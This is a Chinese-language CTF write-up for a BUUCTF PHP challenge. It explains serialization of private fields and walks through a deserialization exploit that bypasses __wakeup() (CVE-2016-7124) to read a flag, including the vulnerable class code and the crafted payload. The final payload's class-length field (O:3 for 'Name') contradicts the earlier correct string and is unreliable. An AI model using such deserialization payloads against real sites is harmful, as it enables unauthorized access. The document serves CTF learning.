BUUCTF-web刷题篇(6)

15.PHP

知识点：

①__wakeup()//将在反序列化之后立即调用（当反序列化时变量个数与实际不符是会绕过）我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件：PHP5<5.6.25,PHP7<7.0.10，或者PHP 7.3.4。

②__construct()//当对象被创建即new之前，会触发进行初始化，但在unserialize()时是不会自动调用的。

③__destruct()//在到某个对象的所有引用都被删除或者当对象被显式销毁时执行或者当所有的操作正常执行完毕之后，需要释放序列化的对象即在脚本结束时（非unset）php才会销毁引用，一般来说在脚本正常结束之前运行。如果抛出异常就不会调用。

④protected声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的对象实例中不可见，也就不能输出。因此保护类的变量在序列化时，前面会加上\0*\0的前缀。这里的\0表示ASCII码为0的字符（不可见字符），而不是\0组合。计算长度时\0(%00)算做一个字符。url中用%00代替。

⑤private声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见，也就不能输出。因此私有类的变量在序列化时，前面都会加上\0类名\0的前缀。计算长度时\0(%00)算作一个字符。url中用%00代替。

⑥public无标记，变量名不变。s:2:"op";i:2;

⑦protected在变量名前添加标记\00*\00。s:5:"\00*\00op";i:2;

⑧private在变量名前添加标记\00类名\00。s:17:"\00类名\00op";i:2;

分析：页面只显示有网站备份，猜测是www.zip，或者直接用dirsearch或者御剑扫描。

下载文件，解压打开。

flag.php

尝试过后不是正确的flag。

index.php：显示包含了class.php文件，并且有一个反序列化点，应该就是php反序列化的问题。

class.php

<?php
include 'flag.php';
 
 
error_reporting(0);
 
 
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
 
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
 
    function __wakeup(){
        $this->username = 'guest';
    }
 
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
 
            
        }
    }
}
?>

发现在__destruct()中有个输出$flag变量的代码。那么思路就是将对象序列化并且修改username的值为admin，传参给select即可。但是我们发现调用__destruct()方法之前会调用__wakeup()方法，修改username的值为guest。那么重点就是绕过这个__wakeup()方法，只要满足反序列化时变量个数与实际不符就可以绕过。

因为当password!=100时，会进入if语句，die()结束程序，而无法输出flag，所以需要将password的值修改为100。

方法：

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
    }
 
    echo serialize(new Name());
?>

输出序列化字符串：

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应，少了两个字符，而Namepassword也少了两个字符，这是因为username和password变量是private类型，变量中的类名前后会有空白符，而复制的时候会丢失，所以还需要加上%00。并且为了绕过__wakeup()，还要将Name后面的数字修改为大于2的数。

结果为：

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

get传参：

?select=O:3:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

得到flag

（思路：在class.php中发现反序列化函数，写序列化函数将对象转化为字符串，通过get方式以select为载体得到该字符串，调用反序列化函数，调用的过程中会自动调用__wakeup()函数，所以通过反序列化变量个数与实际不符绕过__wakeup()函数，最终输出flag）